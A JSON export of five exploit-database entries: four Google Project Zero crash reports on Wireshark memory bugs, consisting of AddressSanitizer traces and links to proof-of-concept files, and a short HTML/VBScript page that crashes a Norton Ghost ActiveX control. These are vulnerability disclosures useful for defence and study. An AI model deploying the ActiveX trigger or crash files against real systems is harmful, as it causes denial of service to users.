{"result": {"zdt": [{"lastseen": "2018-04-13T07:50:41", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-05-13T00:00:00", "title": "Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-13T07:50:41", "vector": "AV:N/AC:H/Au:M/C:C/I:C/A:C/", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-05-13T00:00:00", "id": "1337DAY-ID-26008", "href": "https://0day.today/exploit/description/26008", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0\r\nREAD of size 16385 at 0x61b00001335c thread T0\r\n #0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438\r\n #1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)\r\n #2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32\r\n #3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21\r\n #4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13\r\n #5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21\r\n #6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9\r\n #7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10\r\n #8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3\r\n #17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #18 0x52eebb in process_packet wireshark/tshark.c:3748:5\r\n #19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11\r\n #20 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x5244dd in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51decd in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==8910==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26008"}, {"lastseen": "2018-01-10T03:19:33", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-03-31T00:00:00", "title": "Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-10T03:19:33", "vector": "AV:N/AC:L/Au:M/C:P/I:N/A:P/", "value": 4.7}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-03-31T00:00:00", "id": "1337DAY-ID-25907", "href": "https://0day.today/exploit/description/25907", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=754\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==17304==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004507c1 bp 0x7fff09b13420 sp 0x7fff09b12bd0\r\nREAD of size 1431 at 0x61b00001335c thread T0\r\n #0 0x4507c0 in __interceptor_strlen llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:581\r\n #1 0x7fead8aeeb02 in g_strdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b02)\r\n #2 0x7feae0a0b1ef in string_fvalue_set_string wireshark/epan/ftypes/ftype-string.c:51:30\r\n #3 0x7feae09e83f8 in fvalue_set_string wireshark/epan/ftypes/ftypes.c:530:2\r\n #4 0x7feae0867874 in proto_tree_set_string wireshark/epan/proto.c:3572:3\r\n #5 0x7feae088ae05 in proto_tree_add_string wireshark/epan/proto.c:3478:2\r\n #6 0x7feae088b135 in proto_tree_add_string_format_value wireshark/epan/proto.c:3492:7\r\n #7 0x7feae213aa61 in dissect_pktc_rekey wireshark/epan/dissectors/packet-pktc.c:436:5\r\n #8 0x7feae2139f71 in dissect_pktc wireshark/epan/dissectors/packet-pktc.c:624:16\r\n #9 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #10 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #11 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #12 0x7feae0805dc4 in dissector_try_uint wireshark/epan/packet.c:1186:9\r\n #13 0x7feae296ebf5 in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:583:7\r\n #14 0x7feae297dc90 in dissect wireshark/epan/dissectors/packet-udp.c:1081:5\r\n #15 0x7feae29719d0 in dissect_udp wireshark/epan/dissectors/packet-udp.c:1087:3\r\n #16 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #17 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #18 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #19 0x7feae19601db in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1978:7\r\n #20 0x7feae19cf7c1 in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2431:14\r\n #21 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #22 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #23 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #24 0x7feae0805dc4 in dissector_try_uint wireshark/epan/packet.c:1186:9\r\n #25 0x7feae1fde9c9 in dissect_null wireshark/epan/dissectors/packet-null.c:458:12\r\n #26 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #27 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #28 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #29 0x7feae1542dd5 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #30 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #31 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #32 0x7feae080f58e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #33 0x7feae0800f4f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #34 0x7feae0800324 in dissect_record wireshark/epan/packet.c:509:3\r\n #35 0x7feae07b36c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #36 0x52f11b in process_packet wireshark/tshark.c:3748:5\r\n #37 0x52840c in load_cap_file wireshark/tshark.c:3504:11\r\n #38 0x51e71c in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2148 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7fead8ad7610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7feaed2fef08 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x52473d in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51e12d in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:581 in __interceptor_strlen\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==17304==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12242. Attached is a file which triggers the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39644.zip\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25907"}, {"lastseen": "2018-01-02T01:08:54", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-03-23T00:00:00", "title": "Wireshark - dissect_ber_integer Static Out-of-Bounds Write", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-02T01:08:54", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:P/", "value": 5.4}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-03-23T00:00:00", "id": "1337DAY-ID-25896", "href": "https://0day.today/exploit/description/25896", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=750\r\n \r\nThe following crash due to a static memory out-of-bounds write can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==28209==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fde2f36bfc4 at pc 0x7fde25b1332c bp 0x7fffe48bc670 sp 0x7fffe48bc668\r\nWRITE of size 4 at 0x7fde2f36bfc4 thread T0\r\n #0 0x7fde25b1332b in dissect_ber_integer epan/dissectors/packet-ber.c:2001:16\r\n #1 0x7fde27f46621 in dissect_kerberos_ADDR_TYPE epan/dissectors/../../asn1/kerberos/kerberos.cnf:351:12\r\n #2 0x7fde25b1959a in dissect_ber_sequence epan/dissectors/packet-ber.c:2415:17\r\n #3 0x7fde27f4656f in dissect_kerberos_HostAddress epan/dissectors/../../asn1/kerberos/kerberos.cnf:233:12\r\n #4 0x7fde25b1959a in dissect_ber_sequence epan/dissectors/packet-ber.c:2415:17\r\n #5 0x7fde27f4badf in dissect_kerberos_EncKrbPrivPart epan/dissectors/../../asn1/kerberos/kerberos.cnf:407:12\r\n #6 0x7fde25b040f7 in dissect_ber_tagged_type epan/dissectors/packet-ber.c:695:18\r\n #7 0x7fde27f42384 in dissect_kerberos_ENC_KRB_PRIV_PART epan/dissectors/../../asn1/kerberos/kerberos.cnf:417:12\r\n #8 0x7fde25b1f100 in dissect_ber_choice epan/dissectors/packet-ber.c:2917:21\r\n #9 0x7fde27f4139a in dissect_kerberos_Applications epan/dissectors/../../asn1/kerberos/kerberos.cnf:185:12\r\n #10 0x7fde27f3f7b2 in dissect_kerberos_common epan/dissectors/../../asn1/kerberos/packet-kerberos-template.c:2103:10\r\n #11 0x7fde27f3e22f in dissect_kerberos_main epan/dissectors/../../asn1/kerberos/packet-kerberos-template.c:2134:10\r\n #12 0x7fde26f3c34f in dissect_pktc_mtafqdn epan/dissectors/packet-pktc.c:566:15\r\n #13 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #14 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #15 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #16 0x7fde256072b4 in dissector_try_uint epan/packet.c:1186:9\r\n #17 0x7fde277709e5 in decode_udp_ports epan/dissectors/packet-udp.c:583:7\r\n #18 0x7fde2777fa80 in dissect epan/dissectors/packet-udp.c:1081:5\r\n #19 0x7fde27773840 in dissect_udplite epan/dissectors/packet-udp.c:1094:3\r\n #20 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #21 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #22 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #23 0x7fde267660bb in ip_try_dissect epan/dissectors/packet-ip.c:1978:7\r\n #24 0x7fde26770de8 in dissect_ip_v4 epan/dissectors/packet-ip.c:2472:10\r\n #25 0x7fde26766819 in dissect_ip epan/dissectors/packet-ip.c:2495:5\r\n #26 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #27 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #28 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #29 0x7fde256072b4 in dissector_try_uint epan/packet.c:1186:9\r\n #30 0x7fde26f6e380 in dissect_ppp_common epan/dissectors/packet-ppp.c:4344:10\r\n #31 0x7fde26f6db3c in dissect_ppp_hdlc_common epan/dissectors/packet-ppp.c:5337:5\r\n #32 0x7fde26f65df5 in dissect_ppp_hdlc epan/dissectors/packet-ppp.c:5378:5\r\n #33 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #34 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #35 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #36 0x7fde2634fe55 in dissect_frame epan/dissectors/packet-frame.c:493:11\r\n #37 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #38 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #39 0x7fde25610a7e in call_dissector_only epan/packet.c:2674:8\r\n #40 0x7fde2560243f in call_dissector_with_data epan/packet.c:2687:8\r\n #41 0x7fde25601814 in dissect_record epan/packet.c:509:3\r\n #42 0x7fde255b4bb9 in epan_dissect_run_with_taps epan/epan.c:376:2\r\n #43 0x52f11b in process_packet tshark.c:3748:5\r\n #44 0x52840c in load_cap_file tshark.c:3504:11\r\n #45 0x51e71c in main tshark.c:2213:13\r\n \r\n0x7fde2f36bfc4 is located 4 bytes to the right of global variable 'cb' defined in 'packet-pktc.c:539:27' (0x7fde2f36bfa0) of size 32\r\nSUMMARY: AddressSanitizer: global-buffer-overflow epan/dissectors/packet-ber.c:2001:16 in dissect_ber_integer\r\nShadow bytes around the buggy address:\r\n 0x0ffc45e657a0: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9\r\n 0x0ffc45e657b0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9\r\n 0x0ffc45e657c0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00\r\n 0x0ffc45e657d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e657e0: 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9\r\n=>0x0ffc45e657f0: f9 f9 f9 f9 00 00 00 00[f9]f9 f9 f9 00 00 00 00\r\n 0x0ffc45e65800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==28209==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12206. Attached is a file which triggers the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39604.zip\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25896"}, {"lastseen": "2018-04-06T01:48:14", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-03-07T00:00:00", "title": "Wireshark - wtap_optionblock_free Use-After-Free", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-06T01:48:14", "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/", "value": 8.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-03-07T00:00:00", "id": "1337DAY-ID-25861", "href": "https://0day.today/exploit/description/25861", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=739\r\n \r\nThe following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8\r\nREAD of size 4 at 0x60400009d960 thread T0\r\n #0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20\r\n #1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4\r\n #2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3\r\n #3 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)\r\nfreed by thread T0 here:\r\n #0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30\r\n #1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9\r\n #2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4\r\n #3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3\r\n #4 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35\r\n #3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7\r\n #4 0x528036 in load_cap_file wireshark/tshark.c:3499:12\r\n #5 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free\r\nShadow bytes around the buggy address:\r\n 0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa\r\n=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa\r\n 0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==6853==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39529.zip\n\n# 0day.today [2018-04-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25861"}, {"lastseen": "2018-01-08T15:07:44", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 2, "reporter": "shinnai", "published": "2009-04-23T00:00:00", "title": "Norton Ghost Support module for EasySetup wizard Remote DoS PoC", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-08T15:07:44", "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-04-23T00:00:00", "id": "1337DAY-ID-6843", "href": "https://0day.today/exploit/description/6843", "sourceData": "===============================================================\r\nNorton Ghost Support module for EasySetup wizard Remote DoS PoC\r\n===============================================================\r\n\r\n\r\n-----------------------------------------------------------------------------------------\r\n Norton Ghost Support module for EasySetup wizard Remote DoS/Arbitrary code execution(?)\r\n url: http://www.symantec.com/\r\n\r\n Author: shinnai\r\n\r\n File: EasySetupInt.dll\r\n Ver.: 14.0.4.30167\r\n ProgID: Symantec.EasySetup.1\r\n Descr.: CEasySetup Object - Support module for EasySetup wizard\r\n \r\n Marked as: RegKey Safe for Script: True\r\n RegKey Safe for Init: True\r\n Implements IObjectSafety: False\r\n KillBitSet: False\r\n\r\n Bug info: This component contains methods which lead into a denial of\r\n service.\r\n This is the list of components:\r\n\r\n \"GetBackupLocationPath\"\r\n \"CallUninstall\"\r\n \"SetupDeleteVolume\"\r\n \"CanUseEasySetup\"\r\n \"CallAddInitialProtection\"\r\n \"CallTour\"\r\n\r\n Crash happens here:\r\n\r\n 03A6B9D6 8B10 MOV EDX,DWORD PTR DS:[EAX]\r\n\r\n And registers risuation is:\r\n \r\n EAX 00000000\r\n ECX 774F9997 ole32.774F9997\r\n EDX 019DCB04\r\n EBX 00000000\r\n ESP 019DCAE4\r\n EBP 019DCB9C\r\n ESI 019DCCB8\r\n EDI 00000001\r\n EIP 03A6B9D6 EasySetu.03A6B9D6\r\n\r\n Unfortunately the vulnerability seems to be unexploitable, anyway\r\n I've found a way to execute arbitrary code but it's useless \r\n because requires a high level of user interaction to work.\r\n That's why it will remain private.\r\n I hope that someone else will be able to exploit this vuln\r\n using more convenient ways.\r\n\r\n Peace \r\n\r\n This was written for educational purpose. Use it at your own risk.\r\n Author will be not responsible for any damage.\r\n\r\n Tested on Windows XP Professional SP3 with Internet Explorer 7\r\n-----------------------------------------------------------------------------------------\r\n<object classid='clsid:7972D5BE-2213-4B28-884C-F8F82432EAA5' id='test'></object>\r\n\r\n<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>\r\n\r\n<script language='vbscript'>\r\n Sub tryMe\r\n test.SetupDeleteVolume()\r\n End Sub\r\n</script>\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6843"}]}}